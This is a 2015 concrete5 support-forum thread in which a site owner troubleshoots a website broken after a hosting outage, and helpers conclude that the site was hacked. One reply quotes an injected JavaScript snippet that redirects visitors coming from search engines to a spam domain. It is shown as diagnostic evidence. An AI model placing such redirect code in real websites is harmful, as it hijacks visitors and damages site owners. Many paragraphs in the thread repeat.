Site outage broke my site
Permalink
Hi The company that hosts my website had an outage on one of heir servers that took almost two days to fix. Sadly it screwed up my websitehttp://www.mostrim.org and although I can get to the homepage I cannot go any further, links to other pages in the site don't work. I alkso cannot access the site via the login urlhttp://mostrim.org/index.php/login/... it's just reloads the homepage. They told me to talk to you so would appreciate any help you have to offer. At present I have tried older versions of site.php and dipatcher.php to see if that would work round the problem. They also sent me this bit of information The current PHP version is set for your website is "PHP version: 5.6.02.0". You can check it usinghttp://mostrim.org/phpver.php (this link no longer works) and these instructions In previous reply one of our colleague has explained you that you will need to download the "concrete 5" application related files on your local system and replace those with newer version and then again upload into account and check your website.so i downloaded version 5.6.3.3 and copied the files up to the server but I am still the same.nothing past the homepage
Daily backups according to their adverts but for some reason doesn't seem
to apply in this case. I will get back to them. though
John
On 19 April 2015 at 00:00, concrete5 Community <discussions@concretecms.com>
wrote:
to apply in this case. I will get back to them. though
John
On 19 April 2015 at 00:00, concrete5 Community <discussions@concretecms.com>
wrote:
Just some guesses...
Have you replaced dispatcher.php with the correct one for 5.6.3.3?
It doesn't appear that you have a .htaccess file (I'm getting a 404 athttp://www.mostrim.org/.htaccess... . If there was an .htaccess file, I would get a 403). If you don't have one in the public_html folder, you should create a blank one and see if that helps. I've seen this problem caused by a missing .htaccess file. If that gets you to the Dashboard then you will need to turn Pretty URLs off and back on again to force concrete5 to write new settings into your new .htaccess file.
Have you replaced dispatcher.php with the correct one for 5.6.3.3?
It doesn't appear that you have a .htaccess file (I'm getting a 404 athttp://www.mostrim.org/.htaccess... . If there was an .htaccess file, I would get a 403). If you don't have one in the public_html folder, you should create a blank one and see if that helps. I've seen this problem caused by a missing .htaccess file. If that gets you to the Dashboard then you will need to turn Pretty URLs off and back on again to force concrete5 to write new settings into your new .htaccess file.
My website runs on windows so htaccess I am told does not apply. I also do not have a public_html folder it's called wwwroot. So I am still stuck, I cannot access my site via a login I cannot even get to the login page. If I copied the index.php file from the download of 5.6.6.3 and overwrote the existing index.php file would that let me in? The hosting company thinks I may have to rebuild from scratch but I am hoping there maybe a less drastic solution.. It's taken me months to build, granted all the stuff has been gathered but...
Any thoughts on this - any suggestions on rebuilding a website with minimal pain.
Any thoughts on this - any suggestions on rebuilding a website with minimal pain.
Looking at the source code you have this code before your Doctype declaration
And multiple popover scripts in your footer?
<script type=text/javascript> GID89a=""; var s=document.referrer; var str=window.location.href; if(s.indexOf("google")>0 || s.indexOf("aol")>0 || s.indexOf("yahoo")>0 || s.indexOf("bing")>0 ) window.location.href="http://www.macmakeupset2015.com/"; </script>
And multiple popover scripts in your footer?
Hi Weyboat - not being very au-fait with this type of thing. I am unsure what to say to this. The script you mention is definitely of concern as it has nothing to do with my site which makes me think I or my hosting site was hacked. I did draw their attention to this but as yet no reply. The bootstrap pop-overs are linked to a feature on the bootstrap button add-on which shows a text file when you hover over a button, at least i set them up that way so I would think that's the reason for them.
I can remove that script and reload index.php might be of help?
As I said I'm partly knowledgeable about this stuff which can often be dangerous:-)
I can remove that script and reload index.php might be of help?
As I said I'm partly knowledgeable about this stuff which can often be dangerous:-)
Well I got rid of that script or at least that bit before the doctype but I am no further, Maybe you spotted something else that's off in the code?
I agree that your site has been hacked. I would recommend changing your FTP password.
Look just 'below the fold' on this page for an example of hacking that looks remarkably like what happened to your site:
https://blog.sucuri.net/2014/12/iis-compromised-godaddy-servers-and-...
I can't find anything in your page's source code that would be re-directing your links back to the homepage so I have to assume it's a server problem but I'm not familiar with IIS (Windows) and concrete5 recommends a Linux host so a lot of folks on these support forums will not have answers. If you have access to your site through your Control Panel then you should be able to make a copy of your site and it's database and try installing it on a Linux host. I would run away from your current host if they can't restore their servers properly after a disaster.
Look just 'below the fold' on this page for an example of hacking that looks remarkably like what happened to your site:
https://blog.sucuri.net/2014/12/iis-compromised-godaddy-servers-and-...
I can't find anything in your page's source code that would be re-directing your links back to the homepage so I have to assume it's a server problem but I'm not familiar with IIS (Windows) and concrete5 recommends a Linux host so a lot of folks on these support forums will not have answers. If you have access to your site through your Control Panel then you should be able to make a copy of your site and it's database and try installing it on a Linux host. I would run away from your current host if they can't restore their servers properly after a disaster.
It's looking more and more that I will have to rebuild from scratch. Sadly my only local backup was taken by me after the crash (stable doors etc.) so I don't think an upload of that will be wise. I am contacting my hosts with your suggestions and I must admit I am tempted to abandon them though they have been great for the past 10 years - and I have made some clangers over the years but this is a severe test that it looks like they are going to fail.
I have bought several packages over the past while when i get a new site up a running I can just add them again or do I have to pay for new licences?
Thanks for all the help.
I have bought several packages over the past while when i get a new site up a running I can just add them again or do I have to pay for new licences?
Thanks for all the help.
It still may be recoverable, in whole or just in part, but it would take a lot of code and database digging to recover it and a lot more to be sure it was clean of the hack.
Did you speak to your host about server backups?
I am not sure what your host's backup policy is, but they should have a copy.